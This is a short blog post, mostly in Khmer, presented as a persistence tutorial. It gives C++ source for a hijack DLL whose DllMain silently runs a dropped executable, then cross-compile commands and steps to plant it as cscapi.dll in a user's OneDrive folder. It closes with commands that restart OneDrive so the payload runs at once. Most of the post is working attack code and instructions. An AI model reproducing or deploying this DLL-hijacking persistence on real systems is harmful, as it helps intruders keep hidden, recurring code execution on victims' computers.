This page looks best with JavaScript enabled

DLL Hijacking - Persistence Method

 ·  β˜• 1 min read  ·  🐱 thik

CPP - Execute Command Prompt

αž…αž˜αŸ’αž›αž„αž€αžΌαžŠ αž“αž·αž„ αž€αŸ‚αž”αŸ’αžšαŸ‚αž‘αžΈαžαžΆαŸ†αž„αžšαž”αžŸαŸ‹ Payload​ αŸ”

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

#include <windows.h>
#include <unistd.h>
using namespace std;
void exec1() {
	WinExec("cmd.exe /c C:\\programdata\\putty.exe", 0); 
}
void exec2() {
	WinExec("cmd.exe /c calc.exe", 0);
}
BOOL WINAPI
DllMain (HANDLE hDLL, DWORD dwReason, LPVOID lpReserved)
{
	switch (dwReason)
	{
		case DLL_PROCESS_ATTACH:
			exec1();
			usleep(5000000); //5sec
			exec2();
		break;
	}
return TRUE;
}

αž™αŸ„αž„αžαžΆαž˜αŸ– dllmain

DLL Build

αž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹αž•αŸ’αž‘αžΆαŸ†αž„ Terminal αž€αŸ’αž“αž»αž„αž”αŸ’αžšαž–αŸαž“αŸ’αž’αž”αŸ’αžšαžαž·αž”αžαŸ’αžαž·αž€αžΆαžšαž›αžΈαž“αž»αž… αžšαž½αž…αžœαžΆαž™αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαžŠαžΌαžαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1
2
3
4
5
6
7
8

// To create Windows executables, you need to instsall mingw cross-compiler
sudo apt-get install mingw-w64

//For x64 compile with: 
x86_64-w64-mingw32-gcc r4t.cpp -shared -o output.dll

//For x86 compile with: 
i686-w64-mingw32-gcc r4t.cpp -shared -o output.dll

Get Persistence In Windows 10

αž”αŸ’αžŠαžΌαžšαžˆαŸ’αž˜αŸ„αŸ‡ Payload αžŠαŸ‚αž›αž”αžΆαž“αž”αž„αŸ’αž€αžΎαžαžšαž½αž… αž²αŸ’αž™αž‘αŸ…αž‡αžΆ cscapi.dll αž”αž“αŸ’αž‘αžΆαž”αŸ‹αž˜αž€αž…αž˜αŸ’αž›αž„αž―αž€αžŸαžΆαžšαž˜αŸαžšαŸ„αž‚αž“αŸ„αŸ‡αžŠαžΆαž€αŸ‹αž…αžΌαž›αž‘αŸ…αž€αžΆαž“αŸ‹αž”αžŽαŸ’αžŠαž»αŸ†αž“αŸƒαž―αž€αžŸαžΆαžšαžšαž”αžŸαŸ‹ OneDrive αžŠαŸ‚αž›αž˜αžΆαž“αž‘αžΈαžαžΆαŸ†αž„αžŠαžΌαž…αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αŸ–

1

C:\Users\[username]\AppData\Local\Microsoft\OneDrive\

cscapi.dll

αžœαžΈαž’αžΈαžŸαžΆαžŸαŸ’αžαŸ’αžšαž“αŸαŸ‡αž‚αžΊαž’αžΆαž…αžŠαžΆαž€αŸ‹ Persistence αž”αžΆαž“αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹αž―αž€αžŸαžΆαžšαž™αŸ„αž„αž“αŸƒ onedrive.exe αžŠαžΌαž…αž“αŸαŸ‡αž“αŸ…αžšαžΆαž›αŸ‹αž–αŸαž›αžŠαŸ‚αž›αž€αž˜αŸ’αž˜αžœαž·αž’αžΈ OneDrive αžŠαŸ‚αž›αž”αžΆαž“αžŠαž˜αŸ’αž›αžΎαž„αž˜αž€αžŸαŸ’αžšαžΆαž”αŸ‹αž€αŸ’αž“αž»αž„αžœαžΈαž“αžŠαžΌαžαŸ’αžšαžΌαžœαž”αžΆαž“αž”αžΎαž€αž“αŸ…αž€αŸ’αž“αž»αž„ Start Up αž“αŸ„αŸ‡αžœαžΆαž“αžΉαž„αž‘αŸ…αž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž―αž€αžŸαžΆαžšαž˜αŸαžšαŸ„αž‚αž•αŸ’αž‘αžΆαž›αŸ‹αžαŸ‚αž˜αŸ’αžŠαž„αŸ”

αž–αžΆαž€αŸ’αž™αž”αž‰αŸ’αž‡αžΆαž‘αžΆαŸ†αž„αž–αžΈαžšαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž“αŸαŸ‡αžŸαž˜αŸ’αžšαžΆαž”αŸ‹αžŸαž˜αŸ’αž›αžΆαž”αŸ‹ Process αžŠαŸ‚αž›αž€αŸ†αž–αž»αž„αž”αžΎαž€ αž“αž·αž„αž”αžΎαž€αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž‘αžΎαž„αž˜αž€αžœαž·αž‰ αž€αŸ’αž“αž»αž„αž€αžšαžŽαžΈαž”αžΎαž’αŸ’αž“αž€αž…αž„αŸ‹αžŸαžΆαž€αž˜αŸ’αžŠαž„αžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαžœαž·αž’αžΈαžŸαžΆαžŸαŸ’αžαŸ’αžšαžαžΆαž„αž›αžΎαž—αŸ’αž›αžΆαž˜αŸ—αžŠαŸ„αž™αž˜αž·αž“αž…αžΆαŸ†αž”αžΆαž…αŸ‹αž’αŸ’αžœαžΎαž€αžΆαžš Restart αž€αž»αŸ†αž–αŸ’αž™αžΌαž‘αŸαžšαŸ•

1
2
3
4
5

//To kill the onedrive procress type
taskkill /im onedrive.exe /f

//Run the file
cmd.exe /c onedrive.exe

αž―αž€αžŸαžΆαžšαž™αŸ„αž„αŸ– ippsec
αž’αžΆαž“αž•αž„αžŠαŸ‚αžšαŸ– ain-kun.medium

Share on
Thik
WRITTEN BY
thik
Security Researcher

See Also